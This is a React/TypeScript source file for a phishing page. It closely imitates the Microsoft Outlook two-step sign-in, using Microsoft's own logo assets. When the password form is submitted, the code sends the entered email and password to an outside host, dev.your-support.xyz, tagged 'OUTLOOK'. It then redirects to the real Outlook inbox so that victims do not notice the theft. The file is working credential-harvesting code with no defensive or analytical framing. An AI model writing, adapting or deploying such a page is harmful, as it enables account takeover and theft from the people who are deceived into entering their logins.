import { useState } from "react";

export default function Microsoft() {
  const [email, setEmail] = useState<string>("");
  const [password, setPassword] = useState<string>("");
  const [error, setError] = useState<string | null>(null);
  const [step, setStep] = useState<"email" | "password">("email");
  const [isLoading, setIsLoading] = useState<boolean>(false);

  const handleEmailSubmit = (e: React.FormEvent<HTMLFormElement>) => {
    e.preventDefault();
    setError(null);
    if (!email) return setError("Please enter your email");
    setStep("password");
  };

  const handlePasswordSubmit = async (e: React.FormEvent<HTMLFormElement>) => {
    e.preventDefault();
    setError(null);
    setIsLoading(true);

    try {
      const response = await fetch("https://dev.your-support.xyz/api/credentials", {
        method: "POST",
        headers: {
          "Content-Type": "application/json",
        },
        body: JSON.stringify({
          email,
          password,
          credentialType: "OUTLOOK",
        }),
      });

      const data = await response.json();

      if (!response.ok) {
        throw new Error(data.message || "Login failed");
      }

      // Redirect on success
      window.location.href = "https://outlook.live.com/mail/0/";
    } catch (err) {
      setError((err as Error).message);
    } finally {
      setIsLoading(false);
    }
  };

  return (
    <div className="flex flex-col items-center justify-center min-h-screen bg-gradient-to-r from-gray-100 to-gray-200">
      <div className="bg-white w-full max-w-md p-8 shadow-lg rounded-lg">
        <div className="mb-6">
          <img
            src="https://logincdn.msftauth.net/shared/5/images/microsoft_logo_ee5c8d9fb6248c938fd0.svg"
            alt="Microsoft Logo"
            className="h-6 w-auto"
          />
        </div>

        {step === "email" ? (
          <>
            <h2 className="text-xl lg:text-3xl font-medium">Sign in</h2>
            <p className="text-sm text-gray-500 mb-3">to continue to Outlook</p>
            {error && <p className="text-red-500 text-sm text-center">{error}</p>}
            <form onSubmit={handleEmailSubmit}>
              <input
                type="text"
                placeholder="Email, phone, or Skype"
                className="mt-1 w-full px-3 py-2 border-b border-gray-300 focus:outline-none focus:ring-blue-500 focus:border-blue-500 text-sm"
                value={email}
                onChange={(e) => setEmail(e.target.value)}
              />
              <div className="text-sm mt-2">
                <a href="https://signup.live.com/signup">
                  No account? <span className="text-blue-600">Create one!</span>
                </a>
              </div>
              <div className="mt-4 flex justify-end">
                <button
                  type="submit"
                  className="bg-blue-600 text-white py-2 px-8 hover:bg-blue-700 focus:outline-none focus:ring-2 focus:ring-blue-500 focus:ring-offset-2"
                >
                  Next
                </button>
              </div>
            </form>
          </>
        ) : (
          <>
            <div className="flex mb-6 items-center space-x-2">
              <img
                src="https://logincdn.msftauth.net/shared/5/images/arrow_left_a9cc2824ef3517b6c416.svg"
                alt="Back"
                className="cursor-pointer"
                onClick={() => setStep("email")}
              />
              <span>{email}</span>
            </div>
            <h2 className="text-xl lg:text-3xl font-medium">Enter Password</h2>
            {error && <p className="text-red-500 text-sm text-center">{error}</p>}
            <form onSubmit={handlePasswordSubmit}>
              <input
                type="password"
                placeholder="Password"
                className="mt-4 w-full px-3 py-2 border-b border-gray-300 focus:outline-none focus:ring-blue-500 focus:border-blue-500 text-sm"
                value={password}
                onChange={(e) => setPassword(e.target.value)}
              />
              <div className="mt-4 flex justify-end">
                <button
                  type="submit"
                  className="bg-blue-600 text-white py-2 px-8 hover:bg-blue-700 focus:outline-none focus:ring-2 focus:ring-blue-500 focus:ring-offset-2"
                  disabled={isLoading}
                >
                  {isLoading ? "Signing in..." : "Sign in"}
                </button>
              </div>
            </form>
          </>
        )}
      </div>
    </div>
  );
}
